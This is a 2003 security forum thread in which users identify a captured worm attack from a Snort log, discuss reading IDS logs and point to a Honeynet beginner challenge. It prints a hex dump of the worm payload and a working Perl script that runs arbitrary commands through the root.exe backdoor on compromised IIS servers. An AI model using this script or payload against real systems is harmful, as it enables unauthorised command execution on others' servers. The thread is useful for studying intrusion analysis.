name that Attack #3

bsdjunkie · #1 April 29th, 2003

> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
> FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
> 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
> BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
> 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
> A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
> BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
> 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
> 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
> 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
> 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
> 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
> 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
> 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
> 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
> FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
> 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
> 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
> 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
> 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
> C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
> C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
> E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
> E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
> FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
> FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
> 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
> 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d

inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d

progra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
> 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
> 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
> 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
> 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
> 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
> 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
> 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
> 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
> 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
> 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
> 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
> 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
> 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
> 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
> D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
> 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
> 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
> 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
> 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
> 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
> 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
> 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@..........h.$@.h
> 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
> E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
> 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
> B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
> 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
> 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
> 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
> 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.........h.$@.h.
> 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
> 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
> C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
> 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
> 40 00 89 35 @..5

soup4you2 · #2 April 29th, 2003

CODE RED

**Snickers**

[code:1:505efea7a8]
#!/usr/bin/perl
use Socket;
$port="80";
#lets see if this is really vulnerable to this crap...
if ($#ARGV<1) {die "Usage:CodeGreen IP commandn";}
$host=@ARGV[0];
$target = inet_aton($host);

$command=@ARGV[1];
print "Executing [$command] on $host";
$command=~s/ /%20/g;
my @results=sendraw("GET /scripts/root.exe?/c+$command HTTP/1.0rnrn");
print @results;

sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) ||
die("Socket problems");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect..."); }
}

[/code:1:505efea7a8]

bsdjunkie · #3 April 29th, 2003

hehe, yup, easy one that everyone sees every day im sure =)

soup4you2 · #4 April 29th, 2003

actually since i'm on port 81 i dont see it at all.. i just did a google search for d

inetpub\scripts\root.exe

bsdjunkie · #5 April 29th, 2003

google rules

tarballed · #6 April 30th, 2003

Alright. Let me ask some questions.

First, is that a snort log?

Second, when you are breaking down these logs, what do you look for?

I am very curious and want to learn how to break down IDS logs so I can see what is happening.

Anyone care to bring me up to speed?

Tarballed

schotty · #7 May 2nd, 2003

I cant, but would like to second that motion of education. I want some too ;D I just have a godzillion of these gut feelings (some right, some wrong, some are to have a beer) that I just go with.

bsdjunkie · #8 May 7th, 2003

Ok, when I get home from work tonite Ill take an example packet and try to go through the process on figuring out whats going on.

bsdjunkie · #9 May 12th, 2003

Ok, sorry its taken me a couple days to post again.... was trying to find an easy sample to explain, but then decided to do something a little different

http://project.honeynet.org/scans/scan23/

The honeynet project has challenges to decode captures and figure out what happened in the traces. This is the Beginners Challenge. You all should check it out and try to solve it before looking at the solutions posted :roll:

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)